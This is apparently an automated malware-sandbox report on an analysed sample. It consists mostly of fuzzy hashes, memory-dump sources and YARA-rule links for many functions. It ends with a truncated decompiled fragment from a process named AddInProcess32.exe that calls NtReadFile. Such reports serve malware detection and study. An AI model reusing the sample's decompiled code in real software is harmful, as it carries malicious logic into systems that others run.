Instruction ID: d66c2ea380498ecf5cd9980432d4ba055487bafcbc74b8e0cf8445a50d9c6adb
Opcode Fuzzy Hash: 3880fe7f93f54ecf14c6970d175802041cdb5470c6e3760a26ea912497e77fe7
Instruction Fuzzy Hash: 8F215E31A08625C7D7608A99C9007ABF6F9FB89320F158227E956E7384D3B8D998C791

Uniqueness

Uniqueness Score: -1.00%

Function 065407C4, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80075e62ba592650c93b22c2a4b94abca2c26ebf12a17a217a9247f468503c55
Instruction ID: e52bbb2549a98d34e0e1ad0e1714274e805cd117cabc262f2069b58c72a090d6
Opcode Fuzzy Hash: 80075e62ba592650c93b22c2a4b94abca2c26ebf12a17a217a9247f468503c55
Instruction Fuzzy Hash: 0421923480E388AFC706DF70DC059A9BFB4EF46210F15C1D6E8849B2A2C7344D54CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0272DDC8, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa7e5e9c545536f51fa9400320eb86713136e49a24c08a5d39b03eaff50ea69
Instruction ID: 8d0279e4d43942fdb978738697aa3e28a971017cd6274194443b9416dc8dbaab
Opcode Fuzzy Hash: 6fa7e5e9c545536f51fa9400320eb86713136e49a24c08a5d39b03eaff50ea69
Instruction Fuzzy Hash: 7C11C132B0487487DB34AA7AC8503AAF2AAEB86620F158167E926D7290D634DE49C251

Uniqueness

Uniqueness Score: -1.00%

Function 0272AB50, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7dc319061fa6f536f96bd4fb8208b128e76b6de2e46878adb4cf866cf09eb9
Instruction ID: b6f26d5a99ced74475400a137a405e873235eed81c4d38f6366ff1ca2c7f02aa
Opcode Fuzzy Hash: 2d7dc319061fa6f536f96bd4fb8208b128e76b6de2e46878adb4cf866cf09eb9
Instruction Fuzzy Hash: 8911C036B08175C7DB108A6D9C007BBF2A7EBC4B14F15813BD517E7B80D6788988C35A

Uniqueness

Uniqueness Score: -1.00%

Function 0272E938, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3cc755e6995c4338e889ad192b1f7332074281e65d626b48a86e6735ba9cd8
Instruction ID: 3647d3bab7aa2f52a9871c60731486e5f1385c975626a5e11a356bc4b9d29c25
Opcode Fuzzy Hash: db3cc755e6995c4338e889ad192b1f7332074281e65d626b48a86e6735ba9cd8
Instruction Fuzzy Hash: 85118472E0C036CBD7809A6BD8007BBB2AADB85260F084537E5D6F7240D634BA59C393

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D3AF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01dc1dd5c076053dd37dabc6258269e540eab889bad8b17572ae422b602e1322
Instruction ID: fcbead5b92cf3357321367d0ccc50200f6d829c1f967b62551c35f5806859ad4
Opcode Fuzzy Hash: 01dc1dd5c076053dd37dabc6258269e540eab889bad8b17572ae422b602e1322
Instruction Fuzzy Hash: E411B176408280DFCB11CF10D9C4B16BF71FF94328F24C6A9D8495B616C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0272DA90, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ba634f093104b6c1f2f42b6c278baa379f1d7232881e1cfcd7080a944ac0fe
Instruction ID: 7b60aed4da2ce50fe753beefb4bc2edb71339b1a9f212bf8ba5843bfbd8a644b
Opcode Fuzzy Hash: 27ba634f093104b6c1f2f42b6c278baa379f1d7232881e1cfcd7080a944ac0fe
Instruction Fuzzy Hash: E001B531B1C1758BD724AEA9C850FBBB2B5EB89215F404136D206E7780D6748D5CC2DA

Uniqueness

Uniqueness Score: -1.00%

Function 06540000, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ed13e453c7ae6697189ea8abcad6d70d99ab38064317176558ce72f3ac245f
Instruction ID: 074b1a2f2ce968c68d3f095e50955caf0c01b0ec806bc5998eb4efabfe4a5ff2
Opcode Fuzzy Hash: 04ed13e453c7ae6697189ea8abcad6d70d99ab38064317176558ce72f3ac245f
Instruction Fuzzy Hash: B911172190F3C49FC7039B709C665997F709E17104B5E85EBD484DB1A3E229495DCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D805, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a192497c38020f491ce4973ea639da9fb2a261505e09517a2130f0f479f048
Instruction ID: 4fd271d22a07e67e7405c5db74f07422e98b2db9df79080539f0f8485c157716
Opcode Fuzzy Hash: 41a192497c38020f491ce4973ea639da9fb2a261505e09517a2130f0f479f048
Instruction Fuzzy Hash: A601F77140C340AAF7144E26DCC47A6BBA8DF42378F18C15AEA0D6B286C378A844C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 027268D0, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace86c8f38266da7a4185b57978d9bd3113735f393b388cf08552d0e96aa9997
Instruction ID: 4720e9782834be255cc068fc54c7ae24d4640e6a87976ad6c705a102aa1437bd
Opcode Fuzzy Hash: ace86c8f38266da7a4185b57978d9bd3113735f393b388cf08552d0e96aa9997
Instruction Fuzzy Hash: D701AF38A04164CBEB142A68D40937E7269E740305F40843BE546F6281DB3DC99ADA62

Uniqueness

Uniqueness Score: -1.00%

Function 0272E888, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11b9287d63fe0b5aa9fe2ef345ab946c94ebbb3f2d6a5caee297ce3bddd8b37
Instruction ID: 3738170712601705f31c32016c9d965a86a693e9aaa6ce80a96c29bc7da59c88
Opcode Fuzzy Hash: e11b9287d63fe0b5aa9fe2ef345ab946c94ebbb3f2d6a5caee297ce3bddd8b37
Instruction Fuzzy Hash: DFF0F031B44210ABEB0132799C1ABAF368EDBC5700F004876E103EB3C1CE799E0547A2

Uniqueness

Uniqueness Score: -1.00%

Function 0272AA80, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1f39d1cbf7499abc79c210fba100cc1bd1b8aff8e5f982111cf4fbebb1ae0c
Instruction ID: 121f810a903e564426f713264ec05e8b73d55cdb4773625ebd70f9407e3ed424
Opcode Fuzzy Hash: 1f1f39d1cbf7499abc79c210fba100cc1bd1b8aff8e5f982111cf4fbebb1ae0c
Instruction Fuzzy Hash: 3501AF70F40274DBEB109A989909AAF767AEB01B10F15C876E507E7380D7788E09CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 02723E50, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f8e6338beadc8b03872f5f9c558e1eeae13f3618c40dbb3b16102aaa3335c9
Instruction ID: ae8e6767eda32603671a1274be5aacbf9a06c613b1bc28ee19df1259b1b98ac5
Opcode Fuzzy Hash: 98f8e6338beadc8b03872f5f9c558e1eeae13f3618c40dbb3b16102aaa3335c9
Instruction Fuzzy Hash: D5011E70D0420DEFEB80EFE4D4506AEBBF6EF44304F20C5AAD115AB265EB705A009F81

Uniqueness

Uniqueness Score: -1.00%

Function 0272694D, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af96fd08bf0eb5e311db595fb0669fce775bb2e1bc314625a3a9b3b8423a02aa
Instruction ID: 7c1dea90f1a7cfc60e8b52c4532a136a0be2317e9d589b61ce65f54547d8e996
Opcode Fuzzy Hash: af96fd08bf0eb5e311db595fb0669fce775bb2e1bc314625a3a9b3b8423a02aa
Instruction Fuzzy Hash: 99014F3CA48250CBEB146B64D51A3BD7269E780305F40443BE107E62C1DB3CCD8ADF21

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D804, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10171cc3fd429aa502e872721415c9488c976504733a0e0ed94bd3b5d90d2fc3
Instruction ID: 693389ed6c75205487c172f0ee9fd58308990a23d64b9cb9b3bc6e5249f333b7
Opcode Fuzzy Hash: 10171cc3fd429aa502e872721415c9488c976504733a0e0ed94bd3b5d90d2fc3
Instruction Fuzzy Hash: 86F06871408244AAF7148E16DCC4762FFA8DF51778F18C55AED085B286C3799C44CA71

Uniqueness

Uniqueness Score: -1.00%

Function 027268CB, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f7023a39b6e870e34294c57f6f4c203ac6dc23d16533c04c213dbe49f77101
Instruction ID: 77de60a41a002c14e93a305e40ddb75148dfe67d367163c1a8bacd0b39843b93
Opcode Fuzzy Hash: f0f7023a39b6e870e34294c57f6f4c203ac6dc23d16533c04c213dbe49f77101
Instruction Fuzzy Hash: 26F0C8796081A1CBE7142768D4053BD3B29D742314F044177F097E72C2CB2DC58EDB12

Uniqueness

Uniqueness Score: -1.00%

Function 06540988, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e960f1b00e6edc047b39834a36cda7d9bd0f257c3ee062c2e7fc443fcbebc3
Instruction ID: 5698307cdb882d3d6ae2a55d0ab3c27b9b766eed7d46493ae80ce982e379508b
Opcode Fuzzy Hash: a9e960f1b00e6edc047b39834a36cda7d9bd0f257c3ee062c2e7fc443fcbebc3
Instruction Fuzzy Hash: 93013C3490E3C4AFC743DB74DC15999BFB0AF07214B1981DBD888DB2A3D2395A19CB62

Uniqueness

Uniqueness Score: -1.00%

Function 06540D00, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f685ad3f48cfaebf92588589fbf468b9c422dd0c0af2daf6a1b6f4828cf6350f
Instruction ID: 8fd8f1f1639a6f0d5bf162048819b25b519702cb2df81af9585dc91ae47f26ef
Opcode Fuzzy Hash: f685ad3f48cfaebf92588589fbf468b9c422dd0c0af2daf6a1b6f4828cf6350f
Instruction Fuzzy Hash: CEF04F7490E388AFC707DBB4981165DBFB0AF46204F1681EBC884DB293D7385958DB62

Uniqueness

Uniqueness Score: -1.00%

Function 06540C0C, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b552235cd3796b21e0a15b6d7f74f38d6def79d913cbb3e6efafb78dd3946534
Instruction ID: 1dac73b67301e5d797fdfc1852d50e209fe712140c94ea758647ae36dfcd0c62
Opcode Fuzzy Hash: b552235cd3796b21e0a15b6d7f74f38d6def79d913cbb3e6efafb78dd3946534
Instruction Fuzzy Hash: 05F0493490E384EFCB42DB74D855AA9BFB0EF4A204B1582DBD484DB2A2D2344A49CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02723EDC, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051bcd4e7d6fb8e211f6e5099b9d5c4459aac1038674f410753618fa9e2aef4c
Instruction ID: bb7d669101c380389392c75bf539db2f1edf64f4c361ac3dee80a7c8193c44d7
Opcode Fuzzy Hash: 051bcd4e7d6fb8e211f6e5099b9d5c4459aac1038674f410753618fa9e2aef4c
Instruction Fuzzy Hash: 80F024729082989FF701CBA0C8506AE3F71EB46244B4481CBD1019F6A2E6349601C740

Uniqueness

Uniqueness Score: -1.00%

Function 06540C60, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65a9afc7c7af7ad2647bf17c4272f19a4b42664056c9b20743bf1349d355b52
Instruction ID: 58ab9403212c87f236d57686ce743cae6f34ffa10783c1df202b6d17e793ad57
Opcode Fuzzy Hash: d65a9afc7c7af7ad2647bf17c4272f19a4b42664056c9b20743bf1349d355b52
Instruction Fuzzy Hash: F3F01D3491E3C49FC742DB749859969BFB0AF07124B1A82DBD484DB2A3D6384958CB52

Uniqueness

Uniqueness Score: -1.00%

Function 06540534, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fa85edd06fdd17e1bbdaf0cdf7adef0bc5d3486fdf428ce2fd9f82447d4db8
Instruction ID: d62095674ab85b85edcc5d32931293bb17373d72d3633e960f294758c2033f17
Opcode Fuzzy Hash: 42fa85edd06fdd17e1bbdaf0cdf7adef0bc5d3486fdf428ce2fd9f82447d4db8
Instruction Fuzzy Hash: B0F0903840D384AFCB13CB64DC44969BFB0AF07214F5A81DAE8849B2A2C7349D58CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0272E800, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5ddacf68084d42f7c219489c15a12c22ca03544082dbb8c3a3f1825bd64ebf
Instruction ID: 064c750cb4a30a5732f983d8d3b9d626894c38a9556d23ac653ad75bc94ab282
Opcode Fuzzy Hash: db5ddacf68084d42f7c219489c15a12c22ca03544082dbb8c3a3f1825bd64ebf
Instruction Fuzzy Hash: C2E0ED38744308CBD715AB70D41AB2A335AEB80304F10D838C902CB391EF7AED548B91

Uniqueness

Uniqueness Score: -1.00%

Function 06540826, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd820d5937e1c138fb9ae571d861040a58a679ea6602697fb5c7689eaa18f65a
Instruction ID: b70afda9c3ad7d78411515bdd2ff9e2983665969224ba809e7bfdf758f9fbbe3
Opcode Fuzzy Hash: fd820d5937e1c138fb9ae571d861040a58a679ea6602697fb5c7689eaa18f65a
Instruction Fuzzy Hash: 74E04F3040F384EFC317D7B0D821A667F38EF43118B5901DBD4448B192DB2A5D54C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 06540D20, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910fc92429c52d0b9886956741634e7daacf8ddb0319e68fbd1ba6d1b4a79bd0
Instruction ID: 2b07339b425b0813466ee27ebfbd177c9582afba70bf5169b2a65a3d4f984e4e
Opcode Fuzzy Hash: 910fc92429c52d0b9886956741634e7daacf8ddb0319e68fbd1ba6d1b4a79bd0
Instruction Fuzzy Hash: A9E0E574D00208EFCB58DFA8D400AAEBBB0FB48304F1081A9D844A3354D7355A60DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06540C28, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 351a516e95ce4c9e12d580fdfcbf36427133d0165cfecaa75180ee4ae4c90d69
Instruction ID: ec85a5a8fe52855884ac3c238bda712fedd01664c0b8b5279401a67e4eaac0bc
Opcode Fuzzy Hash: 351a516e95ce4c9e12d580fdfcbf36427133d0165cfecaa75180ee4ae4c90d69
Instruction Fuzzy Hash: EFE0E534E00208EFCB44DFA9D444AADBBF4FB48304F1082E9D909A3364D7345A50DF40

Uniqueness

Uniqueness Score: -1.00%

Function 065409A8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8160ec0529286688dd2b2ad37d0ad0f447c86b0154c36ae6cfcc5bc4a0f4467e
Instruction ID: 62b35dd127fc2b75ec5fa71adc685b6164e07f101e20b7773e7acfb50773df42
Opcode Fuzzy Hash: 8160ec0529286688dd2b2ad37d0ad0f447c86b0154c36ae6cfcc5bc4a0f4467e
Instruction Fuzzy Hash: 2AE0C234E05208EFCB84EFA9D444AADBBF0FB48214F1081AAD808A3354D7359A10CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06540550, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087d610f39bc196c056e372ecff2f0bf1f186d12112353863980c2f2f4f1c4ac
Instruction ID: 021a7aad75be45a3e9116d5dfb937c09818d69e4945ad7586dbd0ee5e5355c11
Opcode Fuzzy Hash: 087d610f39bc196c056e372ecff2f0bf1f186d12112353863980c2f2f4f1c4ac
Instruction Fuzzy Hash: EBE01238900208EFCB44EFA4D844AADBBB0FB09325F208198E94867364C731AA60DB80

Uniqueness

Uniqueness Score: -1.00%

Function 065407E0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087d610f39bc196c056e372ecff2f0bf1f186d12112353863980c2f2f4f1c4ac
Instruction ID: 85a70f6a57e278119acce2744b03b21700e1fe63b016779141001db52f11ca71
Opcode Fuzzy Hash: 087d610f39bc196c056e372ecff2f0bf1f186d12112353863980c2f2f4f1c4ac
Instruction Fuzzy Hash: 60E01238904208EFCB44EFA4D844AADBBB0FB09325F208198E94527364C731AAA0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 06540C80, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f3f93853f3450fd588e66c6dfe8c96d744827be8d235c5a346612da8cbc5a6
Instruction ID: d592bfb0039f602f58f126c695abf8c5c0cff18ac714687e3198a9c18c094b20
Opcode Fuzzy Hash: 27f3f93853f3450fd588e66c6dfe8c96d744827be8d235c5a346612da8cbc5a6
Instruction Fuzzy Hash: 1EE0B678920208DFCB84EFA8D488A6DBBF4FB08615F6081E9D94897354E7319A50CB51

Uniqueness

Uniqueness Score: -1.00%

Function 06540048, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a586faa7de27684a22cb6e26d29281382d64718f6a4a706142fb74f5fa03fc
Instruction ID: e4e269fc20d43825a0634c960e8c351c35ac931a4fc4a3f658dab4b352011c78
Opcode Fuzzy Hash: 29a586faa7de27684a22cb6e26d29281382d64718f6a4a706142fb74f5fa03fc
Instruction Fuzzy Hash: 63E0E230D1520CEFCB48EFB8D4456ADBBB5AB04209FA041A9C948A3244E7359AA1CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06540838, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d44e5e6c94d0772996fbb27f174a6a5b6efcb3ff7534294aa4f2fba1446c1c
Instruction ID: 7e1acb9eb5ebea56fa43cf63441840b55ecde2fbdf831c63dc352cf3b4236881
Opcode Fuzzy Hash: 34d44e5e6c94d0772996fbb27f174a6a5b6efcb3ff7534294aa4f2fba1446c1c
Instruction Fuzzy Hash: 39D01230806308EFC758EBF5E511B7AB779FB0121DF6042EDC90813244EB365D50DA91

Uniqueness

Uniqueness Score: -1.00%

Function 0272EDD8, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872ba8e08e673bbbf30b7274ff94fd428c861dd20d6a9fd3526a1007b75374e0
Instruction ID: 23250a5f0a3a31ed5b4aa7d505fbd50a0461454fbd09d7a0745c1a9b80c2402f
Opcode Fuzzy Hash: 872ba8e08e673bbbf30b7274ff94fd428c861dd20d6a9fd3526a1007b75374e0
Instruction Fuzzy Hash: B0C02B38002608CFC70C37C3F80C3337248F70020EF8C4511D60D02084DB681824C551

Uniqueness

Uniqueness Score: -1.00%

Function 0272FB98, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7882e53f3eefce66e53b611726cd2427e4d2ee139d2b30a6b65ed7c43b22bf8f
Instruction ID: d36931801a06d36ffc7d5f47f957f445842faeb5f73837088713a3a20e174e98
Opcode Fuzzy Hash: 7882e53f3eefce66e53b611726cd2427e4d2ee139d2b30a6b65ed7c43b22bf8f
Instruction Fuzzy Hash: 1CB02B1000210586D10923E0A4243327289A30020CFD04510C748024848F241424C152

Uniqueness

Uniqueness Score: -1.00%

Function 0272FC28, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91308bfbce276cad0e510f63291618fab34798a65a1ef42f90726733abe6cd33
Instruction ID: 5989fdca4bc515068e29335e09cc52a6cfe841a4cf375d5d7e51f8bb1bf90be2
Opcode Fuzzy Hash: 91308bfbce276cad0e510f63291618fab34798a65a1ef42f90726733abe6cd33
Instruction Fuzzy Hash: 1AB02B1004610882D10C22D5A014332728E530020CFC00514CE8C028848B292464C152

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 066148A2, Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526fd0164806dd5f57ee33a390310480c7351ba7f34369ab6dec14cfab869d62
Instruction ID: 26088e5e9e1db703071e7e6ba3e33d9050d2e8d9bbd36e160a2b6d86c2dbfc91
Opcode Fuzzy Hash: 526fd0164806dd5f57ee33a390310480c7351ba7f34369ab6dec14cfab869d62
Instruction Fuzzy Hash: CFA115A248E3C14FC7038B704C795827FB1AE23214B1E85EFD4C58E4A3E299558AD723

Uniqueness

Uniqueness Score: -1.00%

Function 066163AB, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
Instruction ID: eaa528134ed21c623532c7f792ad32a04a37c1a21828bfceefeacef19413c30b
Opcode Fuzzy Hash: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
Instruction Fuzzy Hash: F6816E7294D3C14BDB068F7488B62C2BFB0AE1322431E86EECCD54E557D21E514BDB66

Uniqueness

Uniqueness Score: -1.00%

Function 0272BDF0, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106305dcee75cea8416cef64255c95de395da1d092ebd3897e70eeea493c337b
Instruction ID: 8a4210be6c0f0d4385b9f72563316b218489f8901db8b8e9f00d293c00fefba3
Opcode Fuzzy Hash: 106305dcee75cea8416cef64255c95de395da1d092ebd3897e70eeea493c337b
Instruction Fuzzy Hash: 7741377074D2646BFB18F6788C51B3F626B9BC8704F50D429E606E73C4CF7499054B62

Uniqueness

Uniqueness Score: -1.00%

Function 06620040, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bcf614ae2936ef01a2a5523954625aa52c3a6130329aa39d2318947e74173a
Instruction ID: 00be0bbfb182db59aa221ba47cadd68c65bb70fde038efd4bed13d9d92d97ba1
Opcode Fuzzy Hash: e0bcf614ae2936ef01a2a5523954625aa52c3a6130329aa39d2318947e74173a
Instruction Fuzzy Hash: 55219571E04A188BEB58CF6BD94079AFAF7AFC9310F14C1BA990DA6254DB305946CE41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exe PID: 6200 Parent PID: 6916 AddInProcess32.exeCOMMON

Executed Functions

Function 0041825A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: f4e885cd3ab1b4f3c506fb42318622a4625df21df126e6e33683e91d2c44a7ef
Instruction ID: d69177a7888119c88085938e619b5c5369b9eb1ac9521d538bc82e64ac893fda
Opcode Fuzzy Hash: f4e885cd3ab1b4f3c506fb42318622a4625df21df126e6e33683e91d2c44a7ef
Instruction Fuzzy Hash: 12F017B2200104AFCB04DF99DC80EEB73A9EF8C314F158649BA1DA7241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t3 = _a4 + 0xc48; // 0xc48
				_t28 = _t3;
				E00418DB0(_t27, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
